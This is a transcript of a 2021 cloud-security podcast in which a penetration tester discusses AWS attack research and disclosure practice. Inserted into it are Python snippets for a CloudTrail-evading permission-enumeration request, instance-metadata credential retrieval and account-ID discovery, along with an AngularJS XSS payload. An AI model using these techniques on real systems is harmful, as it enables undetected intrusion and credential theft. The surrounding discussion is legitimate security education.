Screaming in the Cloud - Hacking AWS in Good Faith with Nick Frichette
Episode Date: July 1, 2021

About Nick
Nick Frichette is a Penetration Tester and Team Lead for State Farm. Outside of work he does vulnerability research. His current primary focus is developing techniques for AWS exploitation. Additionally, he is the founder of hackingthe.cloud, an open source encyclopedia of the attacks and techniques you can perform in cloud environments.

Links:
Hacking the Cloud: https://hackingthe.cloud/
Determine the account ID that owned an S3 bucket vulnerability: https://hackingthe.cloud/aws/enumeration/account_id_from_s3_bucket/
Twitter: https://twitter.com/frichette_n
Personal website: https://frichetten.com
Transcript
Hello, and welcome to Screaming in the Cloud, with your host, Chief Cloud Economist at the
Duckbill Group, Corey Quinn.
This weekly show features conversations with people doing interesting work in the world
of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles
for which Corey refuses to apologize.
This is Screaming in the Cloud.
This episode is sponsored in part by Thinkst.
This is going to take a minute to explain, so bear with me.
I linked against an early version of their tool, canarytokens.org, in the very early days of my newsletter.
And what it does is relatively simple and straightforward. It winds up embedding credentials, files, that sort of thing in various
parts of your environment, wherever you want to. It gives you fake AWS API credentials, for example.
And the only thing that these things do is alert you whenever someone attempts to use those things.
It's an awesome approach. I've used something similar for years. Check them out. But wait, there's more. They also have an enterprise option that you should be very much
aware of. Canary.tools. You can take a look at this, but what it does is it provides an enterprise
approach to drive these things throughout your entire environment. You can get a physical device
that hangs out on your network and impersonates whatever you want to. When it gets NMAP scanned or someone attempts to log into it or access files on it, you get instant alerts.
It's awesome.
If you don't do something like this, you're likely to find out that you've gotten breached the hard way.
Take a look at this.
It's one of those few things that I look at and say, wow, that is an amazing idea.
I love it.
That's canarytokens.org and canary.tools.
The first one is free.
The second one is enterprise-y.
Take a look.
I'm a big fan of this.
More from them in the coming weeks.
This episode is also sponsored in part by Lumigo. If you've built anything from serverless, you know that if there's one thing that can be said universally about these
applications, it's that it turns every outage into a murder mystery. Lumigo helps make sense
of all of the various functions that wind up tying together to build applications. It offers
one-click distributed tracing so you can effortlessly find and fix issues in your
serverless and microservices environment. You've created more problems for yourself? Make one of them go away.
To learn more, visit Lumigo.io.
Welcome to Screaming in the Cloud. I'm Corey Quinn.
I spend a lot of time throwing things at AWS in varying capacities.
One area I don't spend a lot of time giving them grief is in the InfoSec world,
because as it turns out, they, and almost everyone else, don't have much of a sense of humor around things like security.
My guest today is Nick Frichette, who's a penetration tester and team lead for State Farm. Nick, thanks for joining me.
Hey, thank you for inviting me on.
So like most folks in InfoSec, you tend to have a bunch of different, I guess, titles
or roles that hang on signs around someone's neck.
And it all sort of distills down on some level, in your case at least, and please correct
me if I'm wrong, to cloud security researcher.
Is that roughly correct, or am I missing something fundamental?
Yeah.
So for my day job, I do penetration testing, and that kind of puts me up against a variety of things, from web applications to client-side applications to sometimes the cloud.
In my free time, though, I like to spend a lot of time on security research, and most recently I've been focusing pretty heavily on AWS.
So let's start at the very beginning.
What is a cloud security researcher?
What is it you'd say it is you do here, for lack of a better phrasing?
Well, to be honest, the phrase security researcher or cloud security researcher has been kind
of, I guess, like watered down in recent years.
Everybody likes to call themselves a researcher in some way or another.
You have some folks who participate in the bug bounty programs.
So for example, GCP and Azure have their own bug bounties.
AWS does not, I'm not too sure why.
And so they want to find vulnerabilities
with the intention of getting cash compensation for it.
You have other folks who are interested
in doing security research to try
and better improve defenses and alerting and monitoring
so that
when the next major breach happens, they're prepared or they'll be able to stop it ahead
of time. From what I do, I'm very interested in offensive security research. So how can I,
as a penetration tester or a red teamer, or I guess an actual criminal, how can I take advantage
of AWS or try to avoid detection
from services like GuardDuty and CloudTrail? So let's break that down a little bit further.
I've heard the term of red team versus blue team used before. Red team presumably is the
offensive security folks. And yes, some of those people are in fact quite offensive.
And blue team is the defense side. In other words, keeping folks out. Is that a reasonable summation of the state of the world?
It can be, yeah, especially when it comes to security. One of
the nice parts, you know, about the whole InfoSec field, I know a lot of folks tend to kind of
just say like, oh, they're there to prevent the next breach. But in reality, InfoSec has a ton
of different niches and different job specialties. Blue teamers, quote unquote, tend to be the defense side working on ensuring that we can alert and monitor potential attacks, whereas red teamers
or penetration testers tend to be the folks who are trying to do the actual exploitation or develop
techniques to do that in the future. So you talk a bit about what you do for work, obviously, but
what really drew my notice was
stuff you do that isn't part of your core job as best I understand it. You're focused on
vulnerability research, specifically with a strong emphasis on cloud exploitation, as you said,
AWS in particular, and you're the founder of Hacking the Cloud, which is an open source
encyclopedia of various attacks and techniques you can perform
in cloud environments. Tell me about that. Yeah, so hacking the cloud came out of a frustration I
had when I was first getting into AWS, that there didn't seem to be a ton of good resources for
offensive security professionals to get engaged in the cloud. By comparison, if you wanted to learn about web application hacking
or attacking Active Directory or reverse engineering,
if you have a credit card, I can point you in the right direction.
But there just didn't seem to be a good course
or introduction to how you as a penetration tester should attack AWS.
There's things like open S3 buckets are a nightmare
or that server-side request forgery on an EC2 instance
can result in your organization being fined very, very heavily.
I kind of wanted to go deeper with that.
And with hacking the cloud,
I've tried to sort of gather a bunch of offensive security research from various blog posts and conference talks into a single location so that both the offense side and the defense side can kind of learn from it
and leverage that to either improve defenses or look for things that they can attack.
It seems to me that doing things like that is not likely to wind up making a whole heck of a lot of
friends over on the cloud provider side. Can you talk a little
bit about how what you do is perceived by the companies you're focusing on?
Yeah. So in terms of relationship, I don't really have too much of an idea of what they think.
I have done some research and written on my blog, as well as published to Hacking the Cloud, some techniques for doing
things like abusing the SSM agent, as well as abusing the AWS API to enumerate permissions
without logging to CloudTrail. And ironically, through the power of IP addresses, I can see
when folks from the Amazon corporate IP address space look at my blog. And that's always fun,
especially when there's like four in the course of a couple of minutes or five or six. But I don't really know too much about what they
or how they view it or if they think it's valuable at all. I hope they do, but really not too sure.
I would imagine that they do on some level. But I guess the big question is, you know that someone
doesn't like what you're doing when they send cease and desist notices or have the police knock on your door. I feel like at most levels, we're past that in an InfoSec level. At least,
I'd like to believe we are. We don't hear about that happening all too often anymore.
But what's your take on it? Yeah, I definitely agree. I definitely think we are beyond that.
Most companies these days know that vulnerabilities are going to happen no matter how hard you try
and how much money you spend. And so it's better to be accepting of that and open to it. And
especially because the InfoSec community can be so, say, noisy at times, it's definitely worth it to
pay attention, definitely be appreciative of the information that may come out. AWS is pretty
awesome to work with, having disclosed to them a
couple times now. They have a safe harbor provision, which essentially says that so long as you're
operating in good faith, you're allowed to do security testing. They do have some rules around that, but they are pretty clear: if you're operating in good faith, you wouldn't be running afoul of them. It tends to be pretty obviously malicious things that they'll ask you to stop. So talk to me a little bit about what
you've found lately and been public about. There have been a number of examples that have come up
whenever people start Googling your name or looking at things you've done. But what's happening
lately? What have you found that's interesting? Yeah, so I think most recently, the thing that's
kind of gotten the most attention has been a really interesting bug I found in the AWS API.
Essentially, kind of the core of it is that when you are interacting with the API, obviously,
that gets logged to CloudTrail so long as it's compatible. So if you are successful, say you want to do, like, Secrets Manager ListSecrets, that shows up in CloudTrail. And similarly, if you do not have that permission on a role or user,
and you try to do it, that access denied also gets logged to CloudTrail. Something kind of
interesting that I found is that by manually modifying requests or malforming them, what we
can do is we can modify the content type header.
And as a result, when you do that, you can provide literally gibberish.
I think I have a VS Code window here somewhere with a content type of meow.
When you do that, the AWS API knows the action that you're trying to call.
But because of that messed up content type, it doesn't know exactly what you're trying to do.
And as a result, it doesn't get logged to CloudTrail.
Now, while that may seem kind of weirdly specific and not really like a concern, the nice part of it, though, is that for some API actions, somewhere in the neighborhood of 600, and I say in the neighborhood just because it fluctuates over time, you can tell if you have that permission or if you don't
without that being logged to
CloudTrail. And so we can do this enumeration of permissions without somebody in the defense side
seeing us do it, which is pretty awesome from an offensive security perspective.
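The mechanics can be sketched with nothing but the standard library. The snippet below builds a SigV4-signed Secrets Manager ListSecrets request, but computes the signature over a gibberish Content-Type, following the public SigV4 recipe. The credentials are fake and the request is never actually sent, so treat this as an illustration of the shape of the technique, not a working exploit, and the claim about CloudTrail behavior is the one Nick reports, not something the code verifies.

```python
import datetime
import hashlib
import hmac

def _hmac(key, msg):
    return hmac.new(key, msg.encode(), hashlib.sha256).digest()

def build_mangled_request(access_key, secret_key, region='us-east-1'):
    """Build headers for Secrets Manager ListSecrets, signed over a
    gibberish Content-Type ('meow'). Because the signature covers the
    mangled header, AWS can still authenticate the caller and evaluate
    IAM; it just can't deserialize the request, and (per the reported
    behavior) the attempt never lands in CloudTrail."""
    host = f'secretsmanager.{region}.amazonaws.com'
    content_type = 'meow'  # the mangled header at the heart of the trick
    body = '{}'
    now = datetime.datetime.now(datetime.timezone.utc)
    amz_date = now.strftime('%Y%m%dT%H%M%SZ')
    datestamp = now.strftime('%Y%m%d')

    # Canonical request per the SigV4 spec, with the bogus Content-Type.
    canonical_headers = (f'content-type:{content_type}\n'
                         f'host:{host}\n'
                         f'x-amz-date:{amz_date}\n'
                         'x-amz-target:secretsmanager.ListSecrets\n')
    signed_headers = 'content-type;host;x-amz-date;x-amz-target'
    canonical_request = '\n'.join([
        'POST', '/', '', canonical_headers, signed_headers,
        hashlib.sha256(body.encode()).hexdigest()])

    scope = f'{datestamp}/{region}/secretsmanager/aws4_request'
    string_to_sign = '\n'.join([
        'AWS4-HMAC-SHA256', amz_date, scope,
        hashlib.sha256(canonical_request.encode()).hexdigest()])

    # Standard SigV4 key derivation chain.
    key = _hmac(('AWS4' + secret_key).encode(), datestamp)
    for part in (region, 'secretsmanager', 'aws4_request'):
        key = _hmac(key, part)
    signature = hmac.new(key, string_to_sign.encode(),
                         hashlib.sha256).hexdigest()

    return {
        'Content-Type': content_type,
        'Host': host,
        'X-Amz-Date': amz_date,
        'X-Amz-Target': 'secretsmanager.ListSecrets',
        'Authorization': (f'AWS4-HMAC-SHA256 '
                          f'Credential={access_key}/{scope}, '
                          f'SignedHeaders={signed_headers}, '
                          f'Signature={signature}'),
    }

headers = build_mangled_request('AKIAFAKEFAKEFAKEFAKE', 'not-a-real-secret')
print(headers['Content-Type'])  # meow
```

In practice, sending a request like this and checking whether the response is an AccessDeniedException or a deserialization error is what tells you, silently, whether the permission is attached.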
On some level, it would be easy to say, well, just not showing up in the logs isn't really
a security problem at all. I'm going to guess that you disagree.
I do, yeah. So let's sort of look at it from a real-world perspective. You know, let's say,
Corey, you're tired of saving people money on their AWS bill. You'd instead maybe want to make a little money on the side, and you're okay with perhaps, you know, committing some crimes to do
it. Through some means, you get access to a company's AWS
credentials for some particular role, whether that's through remote code execution on an EC2
instance, or maybe you find them in an open location like an S3 bucket or a Git repository,
or maybe you phish a developer. Through some means, you have an access key and a secret access
key. The new problem that you have is that you don't know what
those credentials are associated with or what permissions they have. They could be the root
account keys, or they could be, you know, literally locked down to a single S3 bucket to read from.
It all just kind of depends. Now, historically, your options for figuring that out are kind of
limited. Your best bet would be to brute force the AWS API using a tool like Pacu or my personal favorite, which is enumerate-iam by Andres Riancho. And what that
does is it just tries a bunch of API calls and sees which one works and which one doesn't. And
if it works, you clearly know that you have that permission. Now, the problem with that, though,
is that if you were to do that, that's going to light
up CloudTrail like a Christmas tree.
It's going to start showing all these access denies for these various API calls that you've
tried.
And obviously any defender who's paying attention is going to look at that and go, okay, that's suspicious. And you're going to get shut down pretty quickly.
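The brute-force approach itself is just a loop. The toy sketch below is not enumerate-iam; `try_call` is a stand-in for firing a real read-only API request, and the "granted" set simulates the unknown policy. It only shows why the naive version is so noisy: every denied candidate is one more AccessDenied event in CloudTrail.

```python
def enumerate_permissions(try_call, candidate_actions):
    """Try each candidate API action and sort it into allowed/denied.
    try_call(action) stands in for making the real request; in a live
    tool, every attempt, allowed or denied, is logged to CloudTrail."""
    allowed, denied = [], []
    for action in candidate_actions:
        (allowed if try_call(action) else denied).append(action)
    return allowed, denied

# Simulated principal that only holds two permissions.
granted = {'s3:ListBuckets', 'secretsmanager:ListSecrets'}
candidates = ['s3:ListBuckets', 'ec2:DescribeInstances',
              'iam:ListUsers', 'secretsmanager:ListSecrets']
allowed, denied = enumerate_permissions(lambda a: a in granted, candidates)
print(allowed)      # ['s3:ListBuckets', 'secretsmanager:ListSecrets']
print(len(denied))  # 2 noisy AccessDenied events in a real environment
```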
What's nice about this bug that I found is that instead of having to litter CloudTrail with all these logs, we can just do this enumeration for roughly 600-ish API actions across roughly 40 AWS services,
and nobody is the wiser. You can enumerate those permissions, and if they work, fantastic,
and you can then use them. And if you come to find you don't have any of those 600 permissions,
okay, then you can decide on where to go from there or maybe try to risk things showing up in CloudTrail.
CloudTrail is one of those services that I find incredibly useful, or at least I do in theory.
In practice, it seems that things don't show up there, and you don't realize that those types of activities are not being recorded until one day there's an announcement of, hey, that type of activity is now recorded.
As of the time of this recording, the most recent example of that in memory is data plane requests to DynamoDB.
It's, wait a minute, you mean that wasn't being recorded previously?
Huh, I guess it makes sense, but oh dear, and that causes a reevaluation of what's happening
from a security policy and posture perspective for some clients.
There's also, of course, the challenge that
CloudTrail logs take a significant amount of time to show up. It used to be over 20 minutes. I
believe now it's closer to 15, but don't quote me on that, obviously. Run your own tests,
which seems awfully slow for anything that's going to be looking at those in an automated
fashion and taking a reactive or remediation approach to things that show up there. Am I missing something key?
No, I think that is pretty spot on. And believe me, I am fully aware of how long CloudTrail takes
to populate, especially with doing a bunch of research on what is and what is not logged to
CloudTrail. I know that there are some operations that can be logged more quickly than the 15-minute
average. Off the top of my
head, though, I actually don't quite remember what those are. But you're right. In general,
the majority, at least, do take quite a while. And that's definitely time in which an adversary
or someone like me could maybe take advantage of that 15-minute window to try and brute force
those permissions, see what we have access to, and then try to operate and get out with whatever
goodies we've managed to steal.
Let's say that you're doing the thing that you do, however that comes to be.
And I am curious, actually we'll start there.
I am curious, how do you discover these things?
Is it looking at what is presented and then figuring out, huh, how can I wind up subverting the system it's based on?
And similar to the way that I take a look at any random AWS services
and try and figure out how to use it as a database.
How do you find these things?
Yeah, so to be honest, it all kind of depends.
Sometimes it's completely by accident.
So for example, the API bug I described about not logging to CloudTrail,
I actually found that due to copy and pasting code from AWS's website,
and I didn't change the content type header.
And as a result, I happened to notice this weird behavior and kind of took advantage of it.
Other times, it's thinking a little bit about how something is implemented and sort of the security ramifications of it.
So, for example, the SSM agent, which is a phenomenal tool in order to do remote access on your EC2 instances, I was sitting there one day
and just kind of thought, hey, how does that authenticate exactly? And what can I do with it?
Sure enough, it authenticates the exact same way that the AWS API does, that being like the
metadata service on the EC2 instance. And so what I figured out pretty quickly is, even if you can
get access to an EC2 instance,
even as a low privilege user, or you can do server-side request forgery to get the keys,
or if you just have sufficient permissions within the account, you can potentially intercept SSM
messages from like a session and provide your own results. And so in effect, if you've compromised
an EC2 instance, and the only access, say, incident response has into that
box is SSM, you can effectively lock them out of it and kind of do whatever you want in the meantime.
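The authentication path Nick describes is the instance metadata service, which anything on the box (or an SSRF that can reach it) can query. A rough sketch, using the well-known IMDSv1 endpoint; `fetch_credentials` only succeeds from inside an EC2 instance, so the URL construction is the part that runs anywhere, and the role name is a placeholder.

```python
import json
import urllib.request

# 169.254.169.254 is the EC2 instance metadata service (IMDS); the SSM
# agent authenticates with the temporary role credentials it serves.
IMDS_BASE = 'http://169.254.169.254/latest/meta-data'

def credentials_url(role_name, base=IMDS_BASE):
    # Path for the temporary credentials of the instance's IAM role.
    return f'{base}/iam/security-credentials/{role_name}'

def fetch_credentials(role_name):
    """Only works on an EC2 instance (or via SSRF reaching IMDS):
    returns AccessKeyId / SecretAccessKey / Token for the role."""
    with urllib.request.urlopen(credentials_url(role_name), timeout=2) as r:
        return json.loads(r.read())

print(credentials_url('MyInstanceRole'))
```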
That seems like it's something of a problem.
It definitely can be, but it is a lot of fun to play keep away with incident response.
I'd like to reiterate that this is all in environments you control and have permissions to be operating within.
It is not recommended that people pursue things like this in other people's cloud environments without permissions.
I don't want to find us sued for giving crap advice, and I don't want to find listeners getting arrested because they didn't understand the nuances of what we're talking about.
Yes, absolutely. Getting legal approval is really important for
any kind of penetration testing or red teaming. I know some folks sometimes might get carried away,
but definitely be sure to get approval before you do any kind of testing.
So how does someone report a vulnerability to a company like AWS?
So AWS, at least publicly, doesn't have any kind of bug bounty program. But what they do have is a
vulnerability disclosure program. And that is essentially a email address that you can contact
and send information to. And that'll act as your point of contact with AWS while they investigate
the issue. And at the end of their investigation, they can report back with their findings, whether
they agree with you, and they are working to get that patched or fixed immediately, or if they disagree with you and think that everything is hunky-dory, or if you
may be mistaken. I saw a tweet the other day that I would love to get your thoughts on, which said
effectively that if you don't have a public bug bounty program, then any way that a researcher
chooses to disclose the vulnerability is
definitionally responsible on their part because they don't owe you any particular duty of care.
Responsible disclosure, of course, is also referred to as coordinated vulnerability disclosure because
we're always trying to reinvent terminology in this space. What do you think about that? Is there
a duty of care from security researchers to responsibly disclose the vulnerabilities they find or coordinate
those vulnerabilities with vendors in the absence of a public bounty program on turning those things
in? Yeah, you know, I think that's a really difficult question to answer. From my own
personal perspective, I always think it's best to contact the developers or the
company or whoever maintains whatever you've found a vulnerability in. Give them the best shot to have
it fixed or repaired. Obviously, sometimes that works great and the company is super receptive
and they're willing to patch it immediately. And other times they just don't respond or sometimes
they respond harshly. And so depending on the situation,
it may be better for you to release it publicly with the intention that you're informing folks
that this particular company or this particular project may have an issue. On the flip side,
I can kind of understand, although I don't necessarily condone it, why folks pursue things
like exploit brokers, for example. So, you know, if a company doesn't have
a bug bounty program and the researcher isn't expecting any kind of like cash compensation,
I can understand why they may spend tens of hours, maybe hundreds of hours tracing down a
particularly impactful vulnerability only to maybe write a blog post about it or get a little head
pat and say, thanks, nice work. And so I can
see why they may pursue things like selling it to an exploit broker who may pay them a hefty sum if
it is orders of magnitude more. It's, oh, good. You found a way to remotely execute code across
all of EC2 in every region. That is a hypothetical. Don't email me. Have a t-shirt. It seems like you
could basically buy all the t-shirts for what that is worth on the
exploit market. Yes, absolutely. And I do know from some experience that folks will reach out
to you and are interested in particularly some cloud exploits. Nothing minor, like some of the things that I found, but thinking more of, like, accessing resources without anybody
knowing or accessing resources cross-account.
That could go for quite a hefty sum.
This episode is sponsored by ExtraHop.
ExtraHop provides threat detection and response for the enterprise, not the starship.
On-prem security doesn't translate well to cloud or multi-cloud environments,
and that's not even counting IoT.
ExtraHop automatically discovers everything
inside the perimeter, including your cloud workloads and IoT devices, detects these threats
up to 35% faster, and helps you act immediately. Ask for a free trial of detection and response
for AWS today at extrahop.com slash trial.
It always feels squicky on some level to discover something like this that's kind of neat and wind up selling it to basically some arguably terrible people. Maybe we don't know who's buying these things from the exploit broker. Counterpoint: having reported a
few security problems myself to various providers, you get an auto responder, then you get a thank
you email that goes into a
bit more detail for the well-run programs, at least. And invariably, the company's position
is that whatever you found is not as big of a deal as you think it is, and therefore they see no
reason to publish it or go loud with it. Wouldn't you agree? Because on some level, their entire
position is, please don't talk about any security shortcomings
that you may have discovered in our system.
And I get why they don't want that going loud,
but by the same token,
security researchers need a reputation
to continue operating on some level in the market
as security researchers, especially independents,
especially people who are trying to make names
for themselves in the first place.
Yeah.
How do you resolve that dichotomy yourself?
Yeah, so from my perspective, you know, I totally understand why a company or a project wouldn't want you to publicly disclose an issue.
Everybody wants to look good, and nobody wants to be called out for any kind of issue that may have been unintentionally introduced.
I think the thing at the end of the day, though, from my perspective is, you know, if I, some random guy in the middle of nowhere, Illinois, can find a bug, or to be frank, if anybody out there finds a vulnerability in something,
then a much more sophisticated adversary is equally capable of finding such a thing.
And so it's better to have these things out in the open and discussed rather than hidden away,
so that we have the best
chance of anybody being able to defend against it or develop detections for it, rather than just kind of being like, okay, the vendor didn't like what I had to say, I guess I'll go back to doing whatever things I normally do.
You've obviously been doing this for a while, and I'm going to guess that your entire security researcher career has not been focused on cloud environments in general, and AWS in particular.
Yes, I've done some other stuff in relation to abusing GitLab runners.
I also happened to find a pretty neat RCE and privilege escalation in the very popular open source project Pi-hole.
Not sure if you have any experience with that.
Oh, I run it myself all the time for various DNS blocking purposes and other sundry bits of
nonsense. Oh, yes. Good. What I'm trying to establish here is that this is not just one or
two companies that you've worked with. You've done this across the board, which means I can
ask a question without naming and shaming anyone even implicitly. What differentiates good
vulnerability disclosure programs from terrible ones?
Yeah, I think the major differentiator is the reactivity of the project, as in how quickly
they respond to you.
There are some programs I've worked with where you disclose something, maybe even that might
be of a high severity, and you might not hear back for weeks at a time.
Whereas there are other programs, particularly like the MSRC, which is a part of Microsoft, or with AWS's disclosure program, where within
the hour, I had a receipt of, hey, we received this, we're looking into it.
And then within a couple hours after that, yep, we verified it, we see what you're seeing,
and we're going to look at it right away.
I think that's definitely one of the major differentiators for programs.
Are there any companies you'd like to call out
in either direction?
And no is a perfectly valid answer to this one,
for having excellent disclosure programs
versus terrible ones?
I don't know if I'd like to call anybody out negatively,
but in support, I've definitely appreciated working with both AWS's program and Microsoft's MSRC.
I think both of them have done a pretty fantastic job,
and they definitely know what they're doing at this point.
Yeah, I must say that I primarily focus on AWS and have for a while, which should be
blindingly obvious to anyone who's listened to me talk about computers for more than three and a
half minutes. But my experiences with the security folks at AWS have been uniformly positive. Even
when I find things that they don't want me talking about that I will be talking about regardless, they've always been extremely respectful. And I've never walked away from the conversation thinking that I was somehow cheated by the experience. At re:Invent, I got to give a talk around something I reported, specifically about how AWS runs its
vulnerability disclosure program with one of their security engineers, Zach Glick. And he was
phenomenally transparent around how a lot of these things work and what they care about and how they
view these things and what their incentives are. And obviously being empathetic to people reporting
things in, with the understanding that there is no duty of care that says when security researchers discover something, they must immediately go and report it in return for a pat on the head and a thank you. It was really neat being able to
see both sides simultaneously around a particular issue. I'd recommend it to other folks, except I
don't know how you make that lightning strike twice.
It's very, very wise, yes.
Thank you. I do my best.
So what's next for you?
You've obviously found a number of interesting vulnerabilities
around information disclosure.
One of the more recent things that I found
that was sort of neat as I trolled the internet,
I don't believe it was yours,
but there was an ability to determine the account ID
that owned an S3 bucket by enumerating via binary search.
Did you catch that at all?
I did. That was by Ben Bridts, which is a pretty awesome technique,
and that's been something I've been kind of interested in for a while.
There is an ability to enumerate users' roles
and service link roles inside an account,
so long as you know the account ID.
The problem, of course, is getting the account ID. So when Ben put that out there, I was like super stoked about being
able to leverage that now for enumeration and maybe some fun phishing tricks with that.
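Based on the linked write-up, Bridts's technique hinges on an oracle: restrict your own role with an `s3:ResourceAccount` policy condition like `"1*"` and see whether the bucket is still reachable, which leaks whether the owning account ID starts with that prefix. Given such an oracle, recovering the twelve digits is a simple prefix search. The stub below swaps the real policy check for a local function so it runs anywhere; the account ID shown is made up.

```python
def recover_account_id(prefix_allowed, length=12):
    """Recover an account ID digit by digit. prefix_allowed(prefix)
    stands in for the real oracle: can we still access the S3 bucket
    when our policy's s3:ResourceAccount condition is limited to
    'prefix*'?"""
    known = ''
    for _ in range(length):
        for digit in '0123456789':
            if prefix_allowed(known + digit):
                known += digit
                break
    return known

# Local stand-in for the oracle: the "victim" account ID.
victim = '123456789012'
found = recover_account_id(lambda p: victim.startswith(p))
print(found)  # 123456789012
```

The real version narrows each digit with wildcard sets rather than ten serial probes, which is where the "binary search" framing comes from, but the oracle is the same.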
I love the idea. I love seeing that sort of thing being conducted. And AWS's official policy,
as best I remember when I looked at this once, account IDs are not considered
confidential. Do you agree with that? Yep, that is my understanding of how AWS views it.
From my perspective, having an account ID can be beneficial. I mentioned that you can enumerate
users' roles and service-linked roles with it, and that could be super useful from a phishing
perspective. You know, the average phishing email looks like, oh, you want an iPad or, oh, you know, you're the 100th
visitor of some website or something like that. But imagine getting an email that looks like it's
from something like AWS, you know, developer support or from some research program that
they're doing. And they can say to you like, hey, we see that you have these roles in your account with account ID such and such, and we know that you're using EKS and
you're using ECS, that phishing email becomes a lot more believable when suddenly this outside
party seemingly knows so much about your account. And that might be something that you would think,
oh, well, only a real AWS employee or AWS would know that.
So from my perspective, I think it's best to try and keep your account ID secret.
I actually redact it from every screenshot that I publish, or at the very least, I try to.
At the same time, though, it's not the kind of thing that's going to get somebody in your account in a single step. So I can totally see why some folks aren't too concerned about it.
I feel like we also got a bit of a red herring coming from AWS blog posts themselves,
where they always will give screenshots explaining what they do and redact the account ID in every
case. And the reason that I was told at one point was that, oh, we have an internal provisioning
system that's different, it looks different, and I don't want to confuse people
whenever I wind up doing a screenshot.
And that's great, and I appreciate that.
And part of me wonders on one level,
how accurate is that?
Because sure, I understand
what you don't necessarily want to distract people
with something that looks different.
But then I found out that the system is called Isengard.
And yeah, it's great.
They've mentioned it periodically
in blog posts and talks and the rest. And part of me now wonders, oh, wait a minute. Is it actually
because they don't want to disclose the differences between those systems? Or is it because they don't
have license rights publicly to use the word Isengard and don't want to get sued by whoever
owns the rights to the Lord of the Rings trilogy? So one wonders what the real incentives are in
different cases. But I've always viewed account IDs as being the sort of thing that you probably don't want to share them around all the time, but it also doesn't necessarily hurt.
Exactly. Yeah, it's not the kind of thing you want to share with the world immediately, but it doesn't really hurt in the end. There was an early time when the partner network was effectively determining tiers of partner by how much spend
they influenced. And the way that you demonstrated that was by giving account IDs for your client
accounts. The only verification at the time, to my understanding, was that, yep, that mapped to
the client you said it did, and that was it. So I can understand back in those days not wanting to
muddy those waters, but those days are also long past.
So I get it. I'm not going to be the first person to advertise mine, but if you can discover my account ID by looking at a bucket, it doesn't really keep me up at night. So all of those
things considered, we've had a pretty wide ranging conversation here about a variety of things.
What's next? What interests you as far as where you're going to start looking and exploring and
exploiting, as the case may be, various cloud services? Hackingthe.cloud, which there's the
dot in there, which also turns into a domain, excellent choice, is absolutely going to be a
great collection for a lot of what you find and for other people to contribute and learn from one
another. But where are you aimed at? What's next?
Yeah, so one thing I've been really interested in has been fuzzing the AWS API.
As anyone who's ever used AWS before knows, there are hundreds of services
with thousands of potential API endpoints.
And so from a fuzzing perspective, there is a wide variety of things
for us to potentially affect or potentially find
vulnerabilities in. I'm currently working on a library that will allow me to make that fuzzing
a lot easier. You could use things like botocore, boto3, like some of the AWS SDKs. The problem,
though, is that those are designed for sort of like the happy path where you can format your
request the way Amazon wants. As a
security researcher or as someone doing fuzzing, I kind of want to send random gibberish sometimes,
or I want to malform my requests. And so that library is still in development, but it has already
resulted in a bug. While I was fuzzing part of the AWS API, I happened to notice that I broke
Elastic Beanstalk, quite literally. When I was going through the AWS console,
I got the big red error message of
b.requestparameters is null.
And I was like, huh, why is it null?
And come to find out as a result of that,
there is an HTML injection vulnerability in the Elastic,
well, there was an HTML injection vulnerability
in the Elastic Beanstalk for the AWS console.
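As Nick notes, the official SDKs are built for the happy path: they validate and serialize your parameters before anything goes over the wire, which is exactly what a fuzzer needs to sidestep. One way around that is to do the SigV4 signing yourself and attach whatever body you like. Here's a minimal, stdlib-only sketch of that idea; the service, host, and (deliberately malformed) body are illustrative, and error handling plus the actual HTTP send are omitted:

```python
import datetime
import hashlib
import hmac


def _hmac(key: bytes, msg: str) -> bytes:
    return hmac.new(key, msg.encode(), hashlib.sha256).digest()


def sign_request(access_key: str, secret_key: str, region: str,
                 service: str, host: str, body: str) -> dict:
    """Produce SigV4 headers for a hand-crafted (possibly malformed) POST body."""
    amz_date = datetime.datetime.utcnow().strftime("%Y%m%dT%H%M%SZ")
    date_stamp = amz_date[:8]

    # Canonical request: method, URI, query string, headers, signed-header
    # list, and the SHA-256 of whatever body we chose to send.
    payload_hash = hashlib.sha256(body.encode()).hexdigest()
    canonical_headers = f"host:{host}\nx-amz-date:{amz_date}\n"
    signed_headers = "host;x-amz-date"
    canonical_request = "\n".join(
        ["POST", "/", "", canonical_headers, signed_headers, payload_hash])

    scope = f"{date_stamp}/{region}/{service}/aws4_request"
    string_to_sign = "\n".join(
        ["AWS4-HMAC-SHA256", amz_date, scope,
         hashlib.sha256(canonical_request.encode()).hexdigest()])

    # Derive the signing key: secret -> date -> region -> service -> "aws4_request".
    k_date = _hmac(("AWS4" + secret_key).encode(), date_stamp)
    k_region = _hmac(k_date, region)
    k_service = _hmac(k_region, service)
    k_signing = _hmac(k_service, "aws4_request")
    signature = hmac.new(k_signing, string_to_sign.encode(),
                         hashlib.sha256).hexdigest()

    return {
        "X-Amz-Date": amz_date,
        "Authorization": (
            f"AWS4-HMAC-SHA256 Credential={access_key}/{scope}, "
            f"SignedHeaders={signed_headers}, Signature={signature}"),
    }


# A body no SDK would ever build for you: truncated, not valid JSON.
headers = sign_request("AKIAEXAMPLE", "fake-secret-key", "us-east-1",
                       "elasticbeanstalk",
                       "elasticbeanstalk.us-east-1.amazonaws.com",
                       '{"Operation": gibberish, not-even-json')
```

The point of the sketch is that signing is completely independent of what the body contains, so once you own the signing step you can mutate the request however you like and let the service's parser tell you what it thinks.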
Pivoting from there, Elastic Beanstalk uses AngularJS 1.8.1,
or at least it did when I found it.
As a result of that, we can modify that HTML injection
to do template injection.
And for the AngularJS crowd, template injection
is basically cross-site scripting,
because there is no sandbox anymore, at least
in that version.
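For readers who haven't run into AngularJS template injection: the expression sandbox was removed entirely as of AngularJS 1.6, so once attacker-controlled input is reflected into an Angular-compiled region of the page, a template expression evaluates as ordinary JavaScript. The payload below is a classic illustrative example of that class of injection, not the specific one from Nick's finding:

```python
# Illustrative only: how an HTML injection becomes script execution once
# the injected value lands inside an Angular-compiled part of the page.
# `constructor.constructor` reaches the Function constructor, so the
# template expression builds and runs attacker-supplied JavaScript.
payload = "{{constructor.constructor('alert(document.domain)')()}}"

# A hypothetical reflection point in an ng-app-scoped page:
injected_page = f"<div ng-app>user-controlled value: {payload}</div>"
```

In other words, the HTML injection alone only controls markup; it's the Angular interpolation of `{{ ... }}` that upgrades it to cross-site scripting.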
And so as a result of that, I was
able to get cross-site scripting in the AWS console,
which is pretty exciting.
That doesn't tend to happen too frequently.
No, that is not a typical issue that winds up getting disclosed very often.
Definitely, yeah.
And so I was excited about it.
And considering the fact that my library for fuzzing
is barely halfway done, I'm
looking forward to what other things I can find with it. I look forward to reading more. And at
the time of this recording, I should point out that this has not been finalized or made public.
